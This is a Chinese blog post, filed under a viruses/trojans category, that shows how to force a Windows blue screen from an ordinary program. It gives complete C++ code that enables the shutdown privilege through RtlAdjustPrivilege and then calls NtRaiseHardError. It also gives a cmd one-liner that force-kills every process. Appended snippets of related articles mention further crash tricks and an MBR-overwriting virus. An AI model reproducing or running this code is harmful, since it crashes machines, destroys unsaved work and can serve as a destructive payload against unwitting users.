应用层主动触发蓝屏

最新推荐文章于 2024-02-03 13:56:50 发布
最新推荐文章于 2024-02-03 13:56:50 发布
阅读量977 收藏 5
点赞数
分类专栏: 病毒木马
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Simon798/article/details/114142034
版权

闲的,干点无聊的事情 _(:з」∠)_

使用 NtRaiseHardError

#include <iostream>
#include <Windows.h>
#include <winternl.h>
using namespace std;
typedef NTSTATUS(NTAPI *pdef_NtRaiseHardError)(NTSTATUS ErrorStatus, ULONG NumberOfParameters, ULONG UnicodeStringParameterMask OPTIONAL, PULONG_PTR Parameters, ULONG ResponseOption, PULONG Response);
typedef NTSTATUS(NTAPI *pdef_RtlAdjustPrivilege)(ULONG Privilege, BOOLEAN Enable, BOOLEAN CurrentThread, PBOOLEAN Enabled);
int main()
{
    BOOLEAN bEnabled;
    ULONG uResp;
    LPVOID lpFuncAddress = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege");
    LPVOID lpFuncAddress2 = GetProcAddress(GetModuleHandle("ntdll.dll"), "NtRaiseHardError");
    pdef_RtlAdjustPrivilege NtCall = (pdef_RtlAdjustPrivilege)lpFuncAddress;
    pdef_NtRaiseHardError NtCall2 = (pdef_NtRaiseHardError)lpFuncAddress2;
    NTSTATUS NtRet = NtCall(19, TRUE, FALSE, &bEnabled); 
    NtCall2(STATUS_FLOAT_MULTIPLE_FAULTS, 0, 0, 0, 6, &uResp); 
    return 0;
}

使用 cmd 命令

其实就是暴力结束所有进程。。。

Taskkill /fi \"pid ge 1\" /f
一、C++反作弊对抗实战 (基础篇 —— 9.在ring3调用NtShutdownSystem关机与NtRaiseHardError蓝屏)
Koma的主页
03-03 1043
由于一篇幅的代码涉及到强制关机与显示蓝屏的部分,大家测试的时候尽量在虚拟机,否则后果负,手动滑稽~~ // ZwShutdownSystem.cpp : 定义控制台应用程序的入口点。 // #include "stdafx.h" #include <Windows.h> #include "NTPublic.h" typedef UINT (CALLBACK* NTRAISEHARDERROR)(NTSTATUS, ULONG, PUNICODE_STRING, PVOID,HARDER
Windows手动蓝屏触发方法
VinWqx的博客
03-03 3753
1、以管理员身份打开power shell,执行以下命令。其中8392为8(G)*1024+300,具体视电脑内存而定。 reg add "HKLM\System\CurrentControlSet\Control\Session Manager\Memory Management" /v PagingFiles /t REG_MULTI_SZ /d "C:\pagefile.sys 8392 8392" /f reg add "HKLM\System\CurrentControlSet\Contr
一条代码引起的蓝屏
weixin_30929295的博客
10-20 117
应用层调用一条代码即可引起操作系统蓝屏,xp、2003、win7、2008全部受此影响。SendNotifyMessage((HWND)-1,0x180,0,0);详情请查阅Microsoft 安全公告 MS11-077:http://technet.microsoft.com/zh-cn/security/bulletin/MS11-077 转载于:https://www.cnblogs....
Windows 蓝屏、绿屏、黑屏、红屏触发方法
A123456uuu的博客
01-26 1460
Windows 蓝屏、绿屏、黑屏、红屏触发方法
C++蓝屏程序(非管理员)
weixin_45760568的博客
03-13 4495
C++蓝屏程序(非管理员) Windows有一个"未公开"的蓝屏api:NtRaiseHardError 可以在非管理员特权下产生BSOD
powershell API - 内核函数NtRaiseHardError,RtlAdjustPrivilege,NtShutdownSystem(蓝屏,提权,关机)
最新发布
2401_82910308的博客
02-03 807
powershell使用api实现蓝屏和快速关机
电脑蓝屏代码大全
07-30
这种现象在Windows NT系列操作系统中尤为常见,当系统检测到不可恢复的错误时,会触发蓝屏以防止进一步的数据损失。 #### 常见蓝屏代码及含义 ##### 一、基础错误代码 这些错误代码通常与文件管理、内存访问以及...
condrv-bug错误分析:核心驱动触发导致系统蓝屏
当Condriver模块处理数据时出现逻辑错误或者与其他系统组件存在兼容性问题,可能会触发系统崩溃,导致蓝屏死机(BSOD,Blue Screen of Death)。 #### 二、编译错误导致的系统崩溃 在软件开发过程中,编译错误往往...
易语言屏幕蓝屏源码.zip
07-14
2. **模拟系统错误**:源码中可能包含模拟系统错误的方法,这涉及到对Windows API或系统调用的理解,如发送特定的错误信号来触发蓝屏效果。 3. **颜色操作**:蓝屏通常是将屏幕背景色设置为特定的蓝色,并显示白色...
易语言屏幕蓝屏
08-21
易语言屏幕蓝屏源码系统结构:蓝屏2,蓝屏,NtRaiseHardError,RtlAdjustPrivilege,RtlInitUnicodeString,CloseWindowStation,CreateWindowStation,SetHandleInformation,取文本指针, ======程序集1 || ||------_启动子程序 || ||-
蓝屏代码查询对照表
12-01
5. **系统设置**:不当的系统设置,如超频过度、电源管理设置错误等,也可能触发蓝屏。 6. **调试信息**:蓝屏代码还附带了其他调试信息,如内存转储文件,这些文件可以被专业人员分析以确定更深层次的问题。 7. *...
粗糙的Ring0弹Box代码
07-17 1204
 ULONG SDT_ZwRaiseHardError;NTSTATUS UtilsZwRoutine(ULONG  ZwIndex,...){    NTSTATUS    status;    _asm{        mov    eax,[ZwIndex]        Lea    edx,[ebp+0x0c]        Int 0x2e        mov    [statu
深入解析结构化异常处理(SEH)
大神之路漫漫,吾将连滚带爬
06-27 3470
深入解析结构化异常处理(SEH) 一直对Windows异常处理的原理似懂非懂, 看了下面的文章 ,一切都豁然开朗. 1997年文章,Windows技术的根一直没变: http://www.microsoft.com/msj/0197/exception/exception.aspxMatt Pietrek 著 董岩 译在Win32操作系统提供的所有功能中,使用最广泛而又没有公开的恐怕要数结构
深入解析结构化异常处理(SEH) - by Matt Pietrek
dvlinker的技术专栏
09-18 5万+
深入解析结构化异常处理(SEH) - by Matt Pietrek
RtlAdjustPrivilege进程提权,权限ID对照表
zwfgdlc的专栏
10-12 4239
SeCreateTokenPrivilege 0x2 SeAssignPrimaryTokenPrivilege 0x3 SeLockMemoryPrivilege 0x4 SeIncreaseQuotaPrivilege 0x5 SeUnsolicitedInputPrivilege 0x0 SeMachineA
System Error Codes
热门推荐
snail8384的专栏
08-13 8万+
From: http://msdn.microsoft.com/en-us/library/windows/desktop/ms681382%28v=vs.85%29.aspx Applies to: desktop apps only Note   The information on this page is intended to be used by programm
MBR 病毒
LYSM
02-26 2226
背景 MBR全称主引导记录(Master Boot Record),整个硬盘最开头的512字节就是它。 计算机启动后会先运行MBR里的代码进行各种状态的检查和初始化的工作,然后再把控制权转交给操作系统(简单地讲就是一个JMP指令跳到操作系统的起始代码),Windows就加载启动了。 MBR 病毒做的事就是直接把整个MBR覆盖掉,变成了它自己的代码,那么它想干什么都行了,只要它不主动交出代码执行流程,Windows绝没有启动的机会。 代码 此代码来自:https://www.cnblogs.com/xio
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值